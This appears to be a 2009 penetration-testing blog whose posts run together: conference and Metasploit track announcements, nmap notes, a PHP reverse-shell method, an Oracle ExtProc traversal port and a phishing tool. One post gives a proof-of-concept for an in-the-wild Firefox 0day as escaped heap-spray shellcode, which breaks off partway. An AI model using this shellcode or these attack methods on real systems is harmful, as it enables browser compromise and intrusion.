There are so many things going on in vegas this year its hard to keep track of them all.

1.) HD Moore and I are teaching a class on Tactical Exploitation at Blackhat July 27-28th

2.) The first day of Blackhat Briefings, July 29th we have organized an entire Metasploit Track.

Many Metasploit, Attack Research, carnal0wnage and others people will be speaking in this special track, including:

Dino Dai Zovi, Mike Kershaw, Chris Gates, Peter Silberman, Egypt, I)ruid, Valsmith, Colin Ames, and Dave Kerb,

3.) On Thursday July 30th, HD Moore, Valsmith and others will be speaking at an undisclosed location for BsidesLasVegas

4.) Friday night Attack Research has rented the top of the Riviera for a small party. Find someone from AR to get a specially minted party invite challenge coin

5.) Saturday at Defcon we have another special metasploit track that runs all day, same speakers as Blackhat but including HD Moore and others.

6.) Saturday at noon Valsmith will also be giving a skytalk

There us much much more great stuff going on so hope to see you there!

V.

as a note to self (and anyone who reads the blog)

http://nmap.org/5/#changes

"The host discovery (ping probe) defaults have been enhanced to include twice as many probes. The default is now "-PE -PS443 -PA80 -PP". In exhaustive testing of 90 different probes, this emerged as the best four-probe combination, finding 14% more Internet hosts than the previous default, "-PE -PA80". The default for non-root users is -PS80,443, replacing the previous default of -PS80. In addition, ping probes are now sent in order of effectiveness (-PE first) so that less effective probes may not have to be sent. ARP ping is still the default on local ethernet networks."

Background and motivation here:
http://joxeankoret.com/blog/?p=39

Before I forget thanks to egypt, pragmatk, and of course MC...

MSF trunk has had an exploit for awhile that exploits the above
http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/ad...

given the example in Joxean's advisory with the PHP shell I hit up the metasploit php ninja (egypt) on how to leverage it.

Metasploit has a php reverse and bind shell, you can use the multihandler to catch callbacks or connect to the bind shell. To get the shell on the box we can output the payload as raw or base64

After doing my usual digging through my list of malicious urls for the morning I came across a site that is actively exploiting the new Firefox vuln using the exploit written by Simon Berry-Byrne. It uses a standard heapspray technique for code exec. The site that is hosting this exploit appears to be a legitimate site that was compromised. It looks like a RFI may have been used to drop the file on the site. The page located at /img/icons/f.htm is a direct copy of the milw0rm code. They did not even bother to remove any of the comments. A simple download-and-execute payload is used.

So this 0day popped up in some malware today and has been floating around the chinese forums (darkst.com) for a while it seems. It has been reported on by all the infosec sites/blogs at this point.

For those that are interested here's a P0C.

//calc.exe thanks to msf.
var sCode=unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +
"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +
"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" +
"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +
"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c" +
"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f" +
"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b" +

so upgraded to latest version of nmap and it will now give you TNS listener versions. I couldnt find the exact build where this started but its certainly handy.

C:\Users\CG\AppData\Local\msf32>nmap -sV 192.168.73.132

Starting Nmap 4.76 ( http://nmap.org ) at 2009-06-27 10:33 Eastern Daylight Time

Interesting ports on 192.168.73.132:
Not shown: 992 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1028/tcp open msrpc Microsoft Windows RPC
1047/tcp open unknown?
1521/tcp open oracle-tns Oracle TNS Listener

I managed to pull off (with huge work from Ping) organizing a whole track at Blackhat dedicated to Metasploit:

http://www.blackhat.com/html/bh-usa-09/bh-usa-09-schedule.html

Here are the speakers:
dino dai zovi - Macsploitation with Metasploit
mike kershaw - Kismet & MSF
Chris Gates - Breaking the Unbreakable Oracle with Metasploit
peter silberman & Steve Davis - Metasploit Autopsy, Reconstruction the crime scene
Egypt - Using Guided Missles in Drive Bys
Dustin Trammell - MSF Telephony
Valsmith, Colin Ames & David Kerb - Metaphish

As usual I am up against Kaminsky's talk.

See you there!

V.

So this will be half Defcon Teaser and half "happy I got it to work" post.

So back in 2006 Marco Ivaldi released some code and for the Oracle ExtProc directory traversal vulnerability.

links:
http://www.securiteam.com/exploits/6G00L00HPM.html
http://xforce.iss.net/xforce/xfdb/18658
http://www.0xdeadbeef.info/

it essentially allows you to call libraries outside of the %ORACLE_HOME% path. this was later patched to only allow libraries/dlls in %ORACLE_HOME%\bin unless changed in one of your .ora files which really isn't feasible for a remote attacker.

so, I've been able to port the directory traversal exploit code for some our post exploitation tasks for use with the Oracle mixin. see the 2nd link for vulnerable systems, reportedly works on almost all Oracle 9 systems.

So I've been using a series of scripts and custom emails and webpages to do phishing/client-side attacks during pentests for a good few years now and a while back Pragmatk and I, while working on better plugin detection and a few other things for the scripts, decided we needed a GUI, better management, tracking, reports, metrics and trending, better templates, js obfuscation, database functionality, scheduling and a few other things. So basically we wanted a tool that did everything we could think of during a phish.

I've been really slow about building the web frontend but we're finally getting it to a functional beta and should have something ready for release in the next month and a half barring any unforeseen events.

PDF, n.
\p-di-ef\

I. Portable Document Format (PDF) is a file format created by Adobe Systems in 1993 for document exchange.

Defiling, tv.
Defile, v.
\di-ˈfī(-ə)l, dē-\

I. a.to make unclean or impure: b.to corrupt the purity or perfection of.